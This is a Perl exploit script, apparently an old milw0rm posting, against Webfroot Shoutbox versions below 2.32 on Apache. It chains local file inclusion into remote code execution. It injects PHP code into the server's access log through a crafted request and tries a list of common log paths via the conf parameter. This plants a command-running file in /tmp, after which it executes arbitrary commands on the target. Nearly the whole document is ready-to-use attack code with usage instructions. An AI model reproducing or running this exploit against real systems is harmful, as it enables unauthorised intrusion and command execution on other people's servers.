Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution

1. #!/usr/bin/perl
2. #
3. # Webfroot Shoutbox < 2.32 on apache exploit
4. #
5.  
6. use IO::Socket;
7.  
8. my $host = "127.0.0.1";
9. my $port = 80;
10. my $shoutbox = "shoutbox.php?conf=";
11. my $shoutboxpath = "/shoutbox";
12. my $cmd = "ls -l";
13. my $conn;
14. my $type;
15. my @logs = (
16. "/etc/httpd/logs/acces_log",
17. "/etc/httpd/logs/acces.log",
18. "/var/www/logs/access_log",
19. "/var/www/logs/access.log",
20. "/usr/local/apache/logs/access_log",
21. "/usr/local/apache/logs/access.log",
22. "/var/log/apache/access_log",
23. "/var/log/apache/access.log",
24. "/var/log/httpd/access_log",
25. "/var/log/httpd/access.log",
26. #"D:/apps/Apache Group/Apache2/logs/access.log"
27. );
28.  
29. my $qinit = "GET /<?\$h=fopen('/tmp/.ex','w+');fwrite(\$h,'Result:<pre><?system(\$cmd);?>
30. </pre>');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n";
31. my $conn;
32.  
33.  
34. if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){
35. $type = $ARGV[0];
36. }
37. else {
38. print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\n";
39. print "Usage: \n Webfroot.pl (x|r) host [command] [path] [port]\n";
40. print "\ttype\tx = exploit | r = run command (after run with x option)\n";
41. print "\thost\thostname\n";
42. print "\tcommand\tcommand to execute on remote server\n";
43. print "\tpath\tpath to shoutbox installation ex: /shoutbox\n";
44. print "\tport\tport number\n";
45. exit;
46. }
47.  
48. if ($ARGV[1]){
49. $host = $ARGV[1];
50. }
51.  
52. if ($ARGV[2]){
53. $cmd = $ARGV[2];
54. }
55. if ($ARGV[3]){
56. $shoutboxpath = $ARGV[3];
57. }
58. if ($ARGV[4]){
59. $port = int($ARGV[4]);
60. }
61.  
62. $cmd =~ s/ /+/g;
63.  
64. sub connect_to {
65. #print "[x] Connect to $host on port $port ...\n";
66. $conn = IO::Socket::INET->new (
67. Proto => "tcp",
68. PeerAddr => "$host",
69. PeerPort => "$port",
70. ) or die "[*] Can't connect to $host on port $port ...\n";
71. $conn-> autoflush(1);
72. }
73.  
74. sub connect_end {
75. #print "[x] Close connection\n";
76. close($conn);
77. }
78.  
79. sub exploit {
80. my $access_log = $_[0];
81. my $result = "";
82. $access_log =~ s/ /+/g;
83. my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\
84. nHost: $host\nConnection: Close\n\n";
85. print "$query";
86. print "[x] Access log : ", $access_log ,"\n";
87. &connect_to;
88. print $conn $query;
89. while ($line = <$conn>) {
90. $result = $line;
91. #print $result;
92. };
93. &connect_end;
94.  
95. }
96.  
97. sub run_cmd {
98. my $conf="/tmp/.ex";
99. #my $conf="d:/tmp/.ex";
100. my $result = "";
101. my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\
102. nHost: $host\nConnection: Close\n\n";
103.  
104. print "[x] Run command ...\n";
105. &connect_to;
106. print $conn $query;
107. while ($line = <$conn>) {
108. $result .= $line;
109. };
110. &connect_end;
111. if ($result =~ /Result:/){
112. print $result;
113. } else {
114. print $result;
115. print "[*] Failed ...";
116. }
117.  
118. }
119.  
120. sub insert_code {
121. my $result = "";
122. print "[x] Access log : ", $access_log ,"\n";
123. print "[x] Insert php code into apache access log ...\n";
124. &connect_to;
125. print $conn "$qinit";
126. while ($line = <$conn>) {
127. $result .= $line;
128. };
129. &connect_end;
130. print $result;
131. }
132.  
133. if ($type eq "x"){
134. &insert_code;
135. print "[x] Trying to exploit ...\n";
136. for ($i = 0;$i <= $#logs; $i++){
137. &exploit($logs[$i]);
138. }
139. &run_cmd;
140. } else {
141. &run_cmd;
142. }
143.  
144.  
145.  
146. # milw0rm.com [2003-05-29]